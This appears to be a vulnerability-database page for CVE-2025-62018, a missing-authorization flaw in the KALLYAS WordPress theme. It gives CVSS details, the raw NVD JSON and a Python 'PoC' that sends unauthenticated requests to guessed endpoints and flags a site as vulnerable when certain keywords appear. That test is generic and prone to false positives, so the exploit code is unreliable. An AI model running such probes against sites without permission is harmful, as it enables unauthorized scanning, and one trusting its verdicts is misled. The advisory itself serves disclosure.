Security Vulnerability Report
中文
CVE-2025-62018 CVSS 5.3 MEDIUM

CVE-2025-62018

Published: 2025-11-06 16:16:09
Last Modified: 2026-04-27 17:16:30

Description

Missing Authorization vulnerability in hogash KALLYAS kallyas.This issue affects KALLYAS: from n/a through <= 4.22.0.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

KALLYAS Theme <= 4.22.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-62018 PoC - Missing Authorization in KALLYAS Theme # Target: WordPress site with KALLYAS Theme <= 4.22.0 TARGET = "http://target-site.com" # Common KALLYAS theme endpoints that may be vulnerable VULNERABLE_ENDPOINTS = [ "/wp-admin/admin-ajax.php", "/wp-json/kallyas/v1/", "/?rest_route=/kallyas/v1/", "/wp-content/themes/kallyas/" ] def check_vulnerability(): """ Check if target is vulnerable to CVE-2025-62018 This PoC attempts to access protected endpoints without authentication """ results = [] for endpoint in VULNERABLE_ENDPOINTS: url = f"{TARGET}{endpoint}" try: # Send unauthenticated request response = requests.get(url, timeout=10, verify=False) # Check if we can access protected content if response.status_code == 200: # Check for sensitive data exposure if any(keyword in response.text.lower() for keyword in ['admin', 'config', 'settings', 'user', 'password']): results.append({ "endpoint": endpoint, "status": "VULNERABLE", "status_code": response.status_code }) except requests.RequestException as e: print(f"Error testing {endpoint}: {e}") return results if __name__ == "__main__": print("CVE-2025-62018 KALLYAS Theme Authorization Check") vulnerable_points = check_vulnerability() if vulnerable_points: print("Potential vulnerabilities found:") for point in vulnerable_points: print(f"- {point['endpoint']}: {point['status']}") else: print("No obvious vulnerabilities detected")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62018", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:16:08.713", "lastModified": "2026-04-27T17:16:29.973", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in hogash KALLYAS kallyas.This issue affects KALLYAS: from n/a through <= 4.22.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/kallyas/vulnerability/wordpress-kallyas-theme-4-22-0-broken-access-control-vulnerability-2?_s_id=cve", "source": "[email protected]"}]}}